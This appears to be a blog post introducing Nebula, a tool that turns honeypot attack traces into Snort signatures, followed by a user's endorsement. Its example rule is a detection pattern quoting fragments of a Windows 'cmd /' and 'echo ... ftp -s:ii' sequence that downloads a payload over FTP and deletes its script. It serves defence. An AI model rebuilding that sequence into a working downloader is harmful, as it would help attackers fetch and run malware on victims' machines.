Nebula is a network intrusion signature generator. It can help securing a network by automatically deriving and installing filter rules from attack traces. In a common setup, nebula runs as a daemon and receives attacks from honeypots. Signatures are currently published in Snort format.
The code was written to be fast. A signature is not of much value if the generation process takes hours or days. With nebula, you should get a first revision within a few seconds.
The example signature was generated by nebula for FTP downloads as part of multi-stage attacks.
alert tcp any any -> $HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1"; content: "cmd /"; offset: 0; depth: 5;
content: " echo open "; distance: 1; within: 17; content: ">> ii &echo user 1 1 >> ii &echo get "; distance: 13; within: 70;
content: ">> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &"; distance: 2; within: 107; sid: 2000001; rev: 1;)
Nebula successfully generated signatures for input from honeytrap and argos. Feeding it with input from other sources is not very difficult, though. The code archive contains a command line client which submits data from files to a nebula server. It makes use of the nebula library and can be taken as a reference implementation for extensions to other sensors.
It is a very informative tool! We have installed it in our Honeypot system so it takes data and immediately generates signatures and very verifies this signature for false positives and then publishes it. We have successfully created Nessus plugins if there are any 0day attacks in our network. With the help of nebula well there are lots of attack but we need to use our intelligence to find the right one.
Source code for Nebula is also available!
Operating Systems supported:
Unix Systems
Download Nebula here
Searches leading to this post:ich intrusion detected
You must log in to post a comment.